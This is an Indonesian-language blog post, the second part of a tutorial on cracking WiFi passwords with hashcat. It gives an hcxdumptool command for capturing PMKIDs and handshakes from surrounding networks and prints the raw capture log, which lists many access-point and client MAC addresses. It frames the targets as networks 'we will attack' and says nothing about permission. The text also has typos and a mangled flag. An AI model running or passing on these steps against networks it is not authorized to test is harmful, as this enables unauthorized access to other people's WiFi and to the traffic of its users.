halo guys, ini murapakan artikel lanjutan dari artikel sebelumnya yaitu bagaimana cara hack password wifi menggunakan hashcat.
3. Menggunakan hexdum untuk menangkap PMKID dari jaringan lokal
salah satu fungsi dari hexdum sendiri adalah untuk menangkao jaringan yang akan kita serang. gunakan perintah berikut untuk memulai serangan :
hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
fungsi dari -i adalah untuk memberi tahu kita tampilan mana yang akan kita gunakan, dan fungsi dari -o adalah untuk menyimpan file. fungsi dari -c adalah untuk memindai jaringan.
dari perintah diatas kita menggunakan wlan1mon untuk menyimpan PMKID, dan file yang diambil adalah file "galleria.pcapng" dari sini kita belum berhasil menangkap nilai apapun kecuali 1.
warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
ketika sudah terkumpul cukup, kita hentikan dengan mengetikan Ctrl-C untuk mengahiri serangan. dan ini akan menghasilkan file PCAPNG yang berisi informasi yang dibutuhkan untuk melakukan bruteforce, akan tetapi kita perlu mengubah menjadi format yang dapat kita buka di hashcat.
loading...
0 Komentar